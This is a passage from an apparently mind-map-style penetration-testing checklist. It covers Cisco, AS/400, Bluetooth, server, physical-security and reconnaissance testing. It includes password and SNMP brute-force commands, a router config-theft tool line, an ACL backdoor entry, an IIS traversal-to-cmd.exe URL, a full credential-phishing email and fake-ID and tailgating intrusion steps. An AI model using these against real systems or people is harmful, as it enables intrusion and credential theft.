20.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
20.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
20.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
20.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
20.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
20.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
20.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
20.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
20.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
20.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
20.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
20.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
20.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
20.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
20.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
20.1.3.2. Access with Work Station Gateway
20.1.3.2.1. http://target:5061/WSG
20.1.3.2.2. Default AS/400 accounts.
20.1.3.3. Network attacks (next release)
20.1.3.3.1. DB2
20.1.3.3.2. QSHELL
20.1.3.3.3. Hijacking Terminals
20.1.3.3.4. Trojan attacks
20.1.3.3.5. Hacking from AS/400
20.2. Local
20.2.1. System Value Security
20.2.1.1. Untitled
20.2.1.1.1. Untitled
20.2.1.2. Untitled
20.2.1.2.1. Untitled
20.2.1.3. Untitled
20.2.1.3.1. Untitled
20.2.1.4. Untitled
20.2.1.4.1. Recommended value is 30
20.2.2. Password Policy
20.2.2.1. Untitled
20.2.2.1.1. Untitled
20.2.2.1.2. Untitled
20.2.2.2. Untitled
20.2.2.2.1. Untitled
20.2.2.3. Untitled
20.2.2.3.1. Untitled
20.2.2.4. Untitled
20.2.2.4.1. Untitled
20.2.2.5. Untitled
20.2.3. Audit level
20.2.3.1. Untitled
20.2.3.1.1. Recommended value is *SECURITY
20.2.4. Documentation
20.2.4.1. Users class
20.2.4.1.1. Untitled
20.2.4.2. System Audit Settings
20.2.4.2.1. Untitled
20.2.4.3. Special Authorities Definitions
20.2.4.3.1. Untitled
21. Bluetooth Specific Testing
21.1. Bluescanner
21.2. Bluesweep
21.3. btscanner
21.4. Redfang
21.5. Blueprint
21.6. Bluesnarfer
21.7. Bluebugger
21.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
21.8. Blueserial
21.9. Bloover
21.10. Bluesniff
21.11. Exploit Frameworks
21.11.1. BlueMaho
21.11.1.1. Untitled
21.12. Resources
21.12.1. URL's
21.12.1.1. BlueStumbler.org
21.12.1.2. Bluejackq.com
21.12.1.3. Bluejacking.com
21.12.1.4. Bluejackers
21.12.1.5. bluetooth-pentest
21.12.1.6. ibluejackedyou.com
21.12.1.7. Trifinite
21.12.2. Vulnerability Information
21.12.2.1. Common Vulnerabilities and Exploits (CVE)
21.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
21.12.3. White Papers
21.12.3.1. Bluesnarfing
22. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
23. Cisco Specific Testing
23.1. Methodology
23.1.1. Scan & Fingerprint.
23.1.1.1. Untitled
23.1.1.2. Untitled
23.1.1.3. If SNMP is active, then community string guessing should be performed.
23.1.2. Credentials Guessing.
23.1.2.1. Untitled
23.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
23.1.3. Connect
23.1.3.1. Untitled
23.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
23.1.4. Check for bugs
23.1.4.1. Untitled
23.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.
23.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
23.1.5. Further your attack
23.1.5.1. Untitled
23.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
23.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
23.1.5.2. Untitled
23.1.5.2.1. #> access-list 100 permit ip <IP> any
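The running-config/startup-config distinction above is also a detection opportunity for the device owner: anything present only in running-config is either unsaved operator work or an in-memory change of the kind described here. The following Python, added as an example rather than part of the original framework, diffs the two configs and flags access-widening additions; the configs, hostname and addresses are constructed samples, and only numbered access-lists are parsed.

```python
import re

# Constructed sample: the startup-config as captured at the last known-good
# backup.  Hostname, addresses and the secret hash are placeholders.
STARTUP_CONFIG = """\
!
hostname border-rtr
!
enable secret 5 $1$placeholder$hash
!
interface FastEthernet0/0
 ip address 10.1.1.175 255.255.255.0
 ip access-group 100 in
!
access-list 100 permit tcp 10.1.1.0 0.0.0.255 any eq 22
access-list 100 deny ip any any log
!
line vty 0 4
 transport input ssh
!
end
"""

# Constructed sample: the running-config, with two changes that were never
# written to startup-config: a permit-any entry for one outside host in
# ACL 100, and telnet re-enabled on the vty lines.
RUNNING_CONFIG = STARTUP_CONFIG.replace(
    "access-list 100 permit tcp",
    "access-list 100 permit ip host 203.0.113.50 any\naccess-list 100 permit tcp",
).replace(" transport input ssh", " transport input ssh telnet")

# Numbered ACL entries ("access-list 100 permit ...").  Named ACLs, whose
# entries are indented under "ip access-list extended NAME", are not parsed.
ACL_RE = re.compile(r"^access-list (\S+) (permit|deny) (.*)$")


def normalise(config):
    """Drop blank and '!' separator lines and trailing whitespace; keep leading
    indentation, which IOS uses to nest sub-commands under interfaces/lines."""
    return [ln.rstrip() for ln in config.splitlines()
            if ln.strip() and not ln.startswith("!")]


def acl_entries(lines):
    """Group numbered ACL entries by list number, preserving order: an ACL is
    evaluated first-match-wins, so reordering alone changes its meaning."""
    acls = {}
    for ln in lines:
        m = ACL_RE.match(ln)
        if m:
            acls.setdefault(m.group(1), []).append((m.group(2), m.group(3)))
    return acls


def unsaved_changes(running, startup):
    """Return lines only in running-config ('added'), lines only in
    startup-config ('removed') and ACLs whose entries were merely reordered.
    Membership is set-based so IOS re-sorting a section does not alarm;
    ACL ordering is checked separately because there it matters."""
    run_lines, start_lines = normalise(running), normalise(startup)
    run_set, start_set = set(run_lines), set(start_lines)
    run_acls, start_acls = acl_entries(run_lines), acl_entries(start_lines)
    reordered = [name for name, entries in run_acls.items()
                 if name in start_acls
                 and set(entries) == set(start_acls[name])
                 and entries != start_acls[name]]
    return {
        "added": [ln for ln in run_lines if ln not in start_set],
        "removed": [ln for ln in start_lines if ln not in run_set],
        "reordered_acls": reordered,
    }


def risky_additions(changes):
    """Pick out added lines that widen access and deserve an immediate look:
    any new ACL permit entry, and vty transport lines that admit telnet."""
    flagged = []
    for ln in changes["added"]:
        m = ACL_RE.match(ln)
        if m and m.group(2) == "permit":
            flagged.append(ln)
        elif ln.strip().startswith("transport input") and "telnet" in ln.split():
            flagged.append(ln)
    return flagged


if __name__ == "__main__":
    diff = unsaved_changes(RUNNING_CONFIG, STARTUP_CONFIG)
    for kind, lines in diff.items():
        for ln in lines:
            print(f"{kind}: {ln}")
    for ln in risky_additions(diff):
        print(f"REVIEW: {ln}")
```

In practice the two inputs come from `show running-config` and `show startup-config` pulled over the device's management channel, or from the configuration backups already held by a change-management system.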
23.2. Scan & Fingerprint.
23.2.1. Port Scanning
23.2.1.1. nmap
23.2.1.1.1. Untitled
23.2.1.2. Other tools
23.2.1.2.1. Untitled
23.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
23.2.2. Fingerprinting
23.2.2.1. Untitled
23.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
23.2.2.2. Untitled
23.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
23.2.2.2.2. Untitled
23.3. Password Guessing.
23.3.1. Untitled
23.3.1.1. ./CAT -h <IP> -a password.wordlist
23.3.1.2. Untitled
23.3.2. Untitled
23.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
23.3.2.2. Untitled
23.3.3. Untitled
23.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
23.3.3.2. Untitled
23.4. SNMP Attacks.
23.4.1. Untitled
23.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
23.4.1.2. Untitled
23.4.2. Untitled
23.4.2.1. onesixtyone -c SNMP.wordlist <IP>
23.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
23.4.3. Untitled
23.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
23.4.3.2. Untitled
23.5. Connecting.
23.5.1. Telnet
23.5.1.1. Untitled
23.5.1.1.1. telnet <IP>
23.5.1.1.2. Sample Banners
23.5.2. SSH
23.5.3. Web Browser
23.5.3.1. Untitled
23.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
23.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
23.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
23.5.4. TFTP
23.5.4.1. Untitled
23.5.4.1.1. Untitled
23.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
23.5.4.2. Untitled
23.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
23.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
23.5.4.2.3. Creating backdoors in Cisco IOS using TCL
23.6. Known Bugs.
23.6.1. Attack Tools
23.6.1.1. Untitled
23.6.1.1.1. Untitled
23.6.1.2. Untitled
23.6.1.2.1. Web browse to the Cisco device: http://<IP>
23.6.1.2.2. Untitled
23.6.1.2.3. Untitled
23.6.1.2.4. Untitled
23.6.1.3. Untitled
23.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
23.6.2. Common Vulnerabilities and Exploits (CVE) Information
23.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
23.7. Configuration Files.
23.7.1. Untitled
23.7.1.1. Configuration files explained
23.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.
23.7.1.1.2. Untitled
23.7.1.1.3. Untitled
23.7.1.1.4. Password Encryption Utilised
23.7.1.1.5. Untitled
23.7.1.2. Configuration Testing Tools
23.7.1.2.1. Nipper
23.7.1.2.2. fwauto (Beta)
23.8. References.
23.8.1. Cisco IOS Exploitation Techniques
24. Server Specific Tests
24.1. Databases
24.1.1. Direct Access Interrogation
24.1.1.1. MS SQL Server
24.1.1.1.1. Ports
24.1.1.1.2. Version
24.1.1.1.3. osql
24.1.1.2. Oracle
24.1.1.2.1. Ports
24.1.1.2.2. TNS Listener
24.1.1.2.3. SQL Plus
24.1.1.2.4. Default Account/Passwords
24.1.1.2.5. Default SID's
24.1.1.3. MySQL
24.1.1.3.1. Ports
24.1.1.3.2. Version
24.1.1.3.3. Users/Passwords
24.1.1.4. DB2
24.1.1.5. Informix
24.1.1.6. Sybase
24.1.1.7. Other
24.1.2. Scans
24.1.2.1. Default Ports
24.1.2.2. Non-Default Ports
24.1.2.3. Instance Names
24.1.2.4. Versions
24.1.3. Password Attacks
24.1.3.1. Sniffed Passwords
24.1.3.1.1. Cracked Passwords
24.1.3.1.2. Hashes
24.1.3.2. Direct Access Guesses
24.1.4. Vulnerability Assessment
24.1.4.1. Automated
24.1.4.1.1. Reports
24.1.4.1.2. Vulnerabilities
24.1.4.2. Manual
24.1.4.2.1. Patch Levels
24.1.4.2.2. Confirmed Vulnerabilities
24.2. Mail
24.2.1. Scans
24.2.2. Fingerprint
24.2.2.1. Manual
24.2.2.2. Automated
24.2.3. Spoofable
24.2.3.1. Telnet spoof
24.2.3.1.1. telnet target_IP 25
helo target.com
mail from: XXXX@XXX.com
rcpt to: administrator@target.com
data
X-Sender: XXXX@XXX.com
X-Originating-IP: [192.168.1.1]
X-Originating-Email: [XXXX@XXX.com]
MIME-Version: 1.0
To: <administrator@target.com>
From: < XXXX@XXX.com >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit

Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>
Online Security Manager.
Target Ltd
XXXX@XXX.com
.
24.2.4. Relays
24.3. VPN
24.3.1. Scanning
24.3.1.1. 500 UDP IPSEC
24.3.1.2. 1723 TCP PPTP
24.3.1.3. 443 TCP/SSL
24.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
24.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
24.3.2. Fingerprinting
24.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
24.3.3. PSK Crack
24.3.3.1. ikeprobe 80.75.68.27
24.3.3.2. sniff for responses with C&A or ikecrack
24.4. Web
24.4.1. Vulnerability Assessment
24.4.1.1. Automated
24.4.1.1.1. Reports
24.4.1.1.2. Vulnerabilities
24.4.1.2. Manual
24.4.1.2.1. Patch Levels
24.4.1.2.2. Confirmed Vulnerabilities
24.4.2. Permissions
24.4.2.1. PUT /test.txt HTTP/1.0
24.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
24.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6
24.4.3. Scans
24.4.4. Fingerprinting
24.4.4.1. Other
24.4.4.2. HTTP
24.4.4.2.1. Commands
24.4.4.2.2. Modules
24.4.4.2.3. File Extensions
24.4.4.3. HTTPS
24.4.4.3.1. Commands
24.4.4.3.2. Commands
24.4.4.3.3. File Extensions
24.4.5. Directory Traversal
24.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
25. http://secunia.com/advisories/search/?search=citrix
26. Physical Security
26.1. Building Security
26.1.1. Meeting Rooms
26.1.1.1. Check for active network jacks.
26.1.1.2. Check for any information in room.
26.1.2. Lobby
26.1.2.1. Check for active network jacks.
26.1.2.2. Does receptionist/guard leave lobby?
26.1.2.3. Accessible printers? Print test page.
26.1.2.4. Obtain phone/personnel listing.
26.1.3. Communal Areas
26.1.3.1. Check for active network jacks.
26.1.3.2. Check for any information in room.
26.1.3.3. Listen for employee conversations.
26.1.4. Room Security
26.1.4.1. Resistance of lock to picking.
26.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
26.1.4.2. Ceiling access areas.
26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
26.1.5. Windows
26.1.5.1. Check windows/doors for visible intruder alarm sensors.
26.1.5.2. Check visible areas for sensitive information.
26.1.5.3. Can you video users logging on?
26.2. Perimeter Security
26.2.1. Fence Security
26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
26.2.2. Exterior Doors
26.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
26.2.3. Guards
26.2.3.1. Patrol Routines
26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
26.2.3.2. Communications
26.2.3.2.1. Intercept and analyse guard communications. Determine whether the communication methods can be used to aid a physical intrusion.
26.3. Entry Points
26.3.1. Guarded Doors
26.3.1.1. Piggybacking
26.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
26.3.1.2. Fake ID
26.3.1.2.1. Attempt to use fake ID to gain access.
26.3.1.3. Access Methods
26.3.1.3.1. Test 'out of hours' entry methods
26.3.2. Unguarded Doors
26.3.2.1. Identify all unguarded entry points.
26.3.2.1.1. Are doors secured?
26.3.2.1.2. Check locks for resistance to lock picking.
26.3.3. Windows
26.3.3.1. Check windows/doors for visible intruder alarm sensors.
26.3.3.1.1. Attempt to bypass sensors.
26.4. Office Waste
26.4.1. Dumpster Diving - Attempt to retrieve any useful information from the ToE's (Target of Evaluation's) refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.
27. Final Report - template
28. Network Footprinting (Reconnaissance) - The tester attempts to gather as much information as possible about the selected network. Reconnaissance takes two forms, passive and active. Passive reconnaissance is the best starting point: it draws only on publicly available information (web browser, search engines, WHOIS and DNS databases, newsgroups etc.) and sends nothing to the target's own systems, so it does not trigger intrusion detection systems or appear in the target's audit logs. Active reconnaissance interacts directly with the target, for example an attempted DNS zone transfer or a social engineering approach, and may well show up in audit logs.
28.1. Untitled
28.1.1. Authoritative Bodies
28.1.1.1. IANA - Internet Assigned Numbers Authority
28.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
28.1.1.3. NRO - Number Resource Organisation
28.1.1.4. RIR - Regional Internet Registry
28.1.1.4.1. AFRINIC - African Network Information Centre
28.1.1.4.2. APNIC - Asia Pacific Network Information Centre
28.1.1.4.3. ARIN - American Registry for Internet Numbers
28.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
28.1.1.4.5. RIPE NCC - Réseaux IP Européens Network Coordination Centre
28.1.2. Websites
28.1.2.1. Central Ops
28.1.2.1.1. Domain Dossier
28.1.2.1.2. Email Dossier
28.1.2.2. DNS Stuff
28.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
28.1.2.3. Fixed Orbit
28.1.2.3.1. Autonomous System lookups and other online tools available.
28.1.2.4. Geektools
28.1.2.5. IP2Location
28.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
28.1.2.6. Kartoo
28.1.2.6.1. Metasearch engine that visually presents its results.
28.1.2.7. MyIPNeighbors.com
28.1.2.7.1. Reverse IP lookup: lists the other domains hosted on the IP address queried (or on the address a given domain name resolves to).
28.1.2.8. My-IP-Neighbors.com
28.1.2.8.1. Alternative to the above if it is unavailable.
28.1.2.9. myipneighbors.net
28.1.2.10. Netcraft
28.1.2.10.1. Online search tool allowing queries for host information.
28.1.2.11. Passive DNS Replication
28.1.2.11.1. Finds shared domains based on supplied IP addresses
28.1.2.11.2. Note: - This is the data source used by the nmap hostmap.nse script.
28.1.2.12. Robtex
28.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed, with a graphical display of the results showing PTR, A and MX records and AS connectivity.
28.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
28.1.2.13. Traceroute.org
28.1.2.13.1. Website listing a large number of links to online traceroute resources.
28.1.2.14. Wayback Machine
28.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
28.1.2.15. Whois.net
28.1.3. Tools
28.1.3.1. Cheops-ng
28.1.3.2. Country whois
28.1.3.3. Domain Research Tool
28.1.3.4. Firefox Plugins
28.1.3.4.1. AS Number
28.1.3.4.2. Shazou
28.1.3.4.3. Firecat Suite
28.1.3.5. Gnetutil
28.1.3.6. Goolag Scanner
28.1.3.7. Greenwich
28.1.3.8. Maltego
28.1.3.9. GTWhois
28.1.3.10. Sam Spade
28.1.3.11. Smart whois
28.1.3.12. SpiderFoot
28.2. Internet Search
28.2.1. General Information
28.2.1.1. Web Investigator
28.2.1.2. Tracesmart
28.2.1.3. Friends Reunited
28.2.1.4. Ebay - profiles etc.
28.2.2. Financial
28.2.2.1. EDGAR - Company information, including real-time filings. US
28.2.2.2. Google Finance - General Finance Portal
28.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
28.2.2.4. Companies House UK
28.2.2.5. Land Registry UK
28.2.3. Phone Book/ Electoral Roll Information
28.2.3.1. 123people
28.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
28.2.3.2. 192.com
28.2.3.2.1. Electoral Roll Search. UK
28.2.3.3. 411
28.2.3.3.1. Online White Pages and Yellow Pages. US
28.2.3.4. Untitled
28.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
28.2.3.5. BT.com. UK
28.2.3.5.1. Residential
28.2.3.5.2. Business
28.2.3.6. Pipl
28.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
28.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
28.2.3.7. Spokeo
28.2.3.7.1. http://www.spokeo.com/user?q=domain_name
28.2.3.7.2. http://www.spokeo.com/user?q=email_address
28.2.3.8. Yasni
28.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
28.2.3.9. Zabasearch
28.2.3.9.1. People Search Engine. US
28.2.4. Generic Web Searching
28.2.4.1. Code Search
28.2.4.2. Forum Entries
28.2.4.3. Google Hacking Database
28.2.4.4. Google
28.2.4.4.1. Email Addresses
28.2.4.4.2. Contact Details
28.2.4.5. Newsgroups/forums
28.2.4.6. Blog Search
28.2.4.6.1. Yammer
28.2.4.6.2. Google Blog Search
28.2.4.6.3. Technorati
28.2.4.6.4. Jaiku
28.2.4.6.5. Present.ly
28.2.4.6.6. Twitter Network Browser
28.2.4.7. Search Engine Comparison/ Aggregator Sites
28.2.4.7.1. Clusty
28.2.4.7.2. Grokker
28.2.4.7.3. Zuula
28.2.4.7.4. Exalead
28.2.4.7.5. Delicious
28.2.5. Metadata Search
28.2.5.1. Untitled
28.2.5.1.1. MetaData Visualisation Sites
28.2.5.1.2. Tools
28.2.5.1.3. Wikipedia Metadata Search
28.2.6. Social/ Business Networks
28.2.6.1. Untitled
28.2.6.1.1. Africa
28.2.6.1.2. Australia
28.2.6.1.3. Belgium
28.2.6.1.4. Holland
28.2.6.1.5. Hungary
28.2.6.1.6. Iran
28.2.6.1.7. Japan
28.2.6.1.8. Korea
28.2.6.1.9. Poland
28.2.6.1.10. Russia
28.2.6.1.11. Sweden
28.2.6.1.12. UK
28.2.6.1.13. US
28.2.6.1.14. Assorted
28.2.7. Resources
28.2.7.1. OSINT
28.2.7.2. International Directory of Search Engines
28.3. DNS Record Retrieval from publically available servers
28.3.1. Types of Information Records
28.3.1.1. SOA Records - Start of Authority: names the primary master name server for the zone and the responsible party's mailbox, and carries the zone serial number and timers (refresh, retry, expire, minimum).
28.3.1.2. MX Records - List of a host's or domain's mail exchanger server(s), with preference values.
28.3.1.3. NS Records - List of a host's or domain's name server(s).
28.3.1.4. A Records - Address record mapping a host name to an IPv4 address (AAAA for IPv6). A host must have one for its IP address to be found via DNS.
28.3.1.5. PTR Records - Reverse mapping from an IP address (under in-addr.arpa or ip6.arpa) back to a host name.
28.3.1.6. SRV Records - Service location record: gives the host and port of a named service (e.g. _ldap._tcp, _kerberos._tcp), which makes them useful for locating domain controllers.
28.3.1.7. HINFO Records - Host information record with CPU type and operating system. Rarely populated today, but a direct leak of platform details when it is.
28.3.1.8. TXT Records - Generic text record; in practice carries SPF, DKIM and domain-verification strings that reveal the third-party services a domain uses.
28.3.1.9. CNAME - A host's canonical name; allows additional names/ aliases to be used to locate a computer.
28.3.1.10. RP - Responsible person for the domain.
28.3.2. Database Settings
28.3.2.1. version.bind - a TXT query in the CHAOS class that many BIND servers answer with their version string unless the administrator has overridden or disabled it.
28.3.2.2. Serial
28.3.2.3. Refresh
28.3.2.4. Retry
28.3.2.5. Expiry
28.3.2.6. Minimum
28.3.3. Sub Domains
28.3.4. Internal IP ranges
28.3.4.1. Reverse DNS for IP Range
28.3.5. Zone Transfer
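Worked example for the record retrieval, version.bind and reverse-lookup items above (added here; it is not code from the original page): a stdlib-only Python DNS client that builds queries, decodes compressed names and TXT/PTR/A answers, and derives the in-addr.arpa owner name for a PTR sweep over a range. The version.bind reply its helper produces is constructed, not captured from a real server, so the parser can be exercised offline; query_udp() is the only function that touches the network.

```python
"""DNS footprinting building blocks: build a query, decode the reply, derive PTR names.
Added example, not from the original checklist; the reply built by
constructed_version_reply() is constructed, not captured from a real server."""
import socket
import struct

TYPE = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "HINFO": 13, "MX": 15, "TXT": 16, "RP": 17}
CLASS = {"IN": 1, "CH": 3}     # version.bind lives in class CH (CHAOS), not IN

def encode_name(name: str) -> bytes:
    """'version.bind' -> b'\\x07version\\x04bind\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"

def build_query(name: str, qtype: str, qclass: str = "IN", qid: int = 0x1234) -> bytes:
    """Header with RD set and one question, followed by the question section."""
    return (struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0) + encode_name(name)
            + struct.pack("!HH", TYPE[qtype], CLASS[qclass]))

def ptr_name(ipv4: str) -> str:
    """'192.0.2.10' -> '10.2.0.192.in-addr.arpa' (owner name for a reverse lookup)."""
    return ".".join(reversed(ipv4.split("."))) + ".in-addr.arpa"

def read_name(msg: bytes, off: int) -> tuple:
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, jumped, end, hops = [], False, off, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # compression pointer, RFC 1035 s4.1.4
            if not jumped:
                end, jumped = off + 2, True
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (end if jumped else off)

def decode_rdata(msg: bytes, off: int, rtype: int, rdata: bytes):
    """Decode the types this section lists; anything else comes back as hex."""
    if rtype == TYPE["A"] and len(rdata) == 4:
        return socket.inet_ntoa(rdata)
    if rtype in (TYPE["NS"], TYPE["CNAME"], TYPE["PTR"]):
        return read_name(msg, off)[0]
    if rtype == TYPE["TXT"]:                      # sequence of <len><chars> strings
        strings, i = [], 0
        while i < len(rdata):
            n = rdata[i]
            strings.append(rdata[i + 1:i + 1 + n].decode("latin-1"))
            i += 1 + n
        return strings
    return rdata.hex()

def parse_response(msg: bytes) -> dict:
    """Parse the header, skip the question section, decode every answer record."""
    qid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = read_name(msg, off)
        off += 4                                  # QTYPE + QCLASS
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        answers.append({"name": name, "type": rtype, "class": rclass, "ttl": ttl,
                        "data": decode_rdata(msg, off, rtype, msg[off:off + rdlen])})
        off += rdlen
    return {"id": qid, "rcode": flags & 0xF, "authoritative": bool(flags & 0x0400),
            "answers": answers}

def query_udp(server: str, packet: bytes, timeout: float = 3.0) -> bytes:
    """Send one query to UDP/53 and return the raw reply (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (server, 53))
        return s.recv(4096)

def constructed_version_reply(version: str, qid: int = 0xBEEF) -> bytes:
    """Constructed 'version.bind CH TXT' reply: QR+AA set, one answer pointing at the question name."""
    question = build_query("version.bind", "TXT", "CH", qid)[12:]
    header = struct.pack("!HHHHHH", qid, 0x8400, 1, 1, 0, 0)
    txt = bytes([len(version)]) + version.encode()
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE["TXT"], CLASS["CH"], 0, len(txt)) + txt
    return header + question + answer
```

For a live check, send build_query('version.bind', 'TXT', 'CH') with query_udp() to each of the target's name servers and feed the reply to parse_response(); a well-run server will have overridden the string or refuse the CHAOS class. For a reverse sweep, build a PTR query for ptr_name(ip) for each address in the range and collect the names returned. A zone transfer (AXFR) is not attempted here: it runs over TCP with a two-byte length prefix on each message, and the target's servers should refuse it to anyone but their own secondaries.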
28.4. Social Engineering
28.4.1. Remote
28.4.1.1. Phone
28.4.1.1.1. Scenarios
28.4.1.1.2. Results
28.4.1.1.3. Contact Details
28.4.1.2. Email
28.4.1.2.1. Scenarios
28.4.1.2.2. Software
28.4.1.2.3. Results
28.4.1.2.4. Contact Details
28.4.1.3. Other
28.4.2. Local
28.4.2.1. Personas
28.4.2.1.1. Name
28.4.2.1.2. Phone
28.4.2.1.3. Email
28.4.2.1.4. Business Cards
28.4.2.2. Contact Details
28.4.2.2.1. Name
28.4.2.2.2. Phone number
28.4.2.2.3. Email
28.4.2.2.4. Room number
28.4.2.2.5. Department
28.4.2.2.6. Role
28.4.2.3. Scenarios
28.4.2.3.1. New IT employee
28.4.2.3.2. Fire Inspector
28.4.2.4. Results
28.4.2.5. Maps
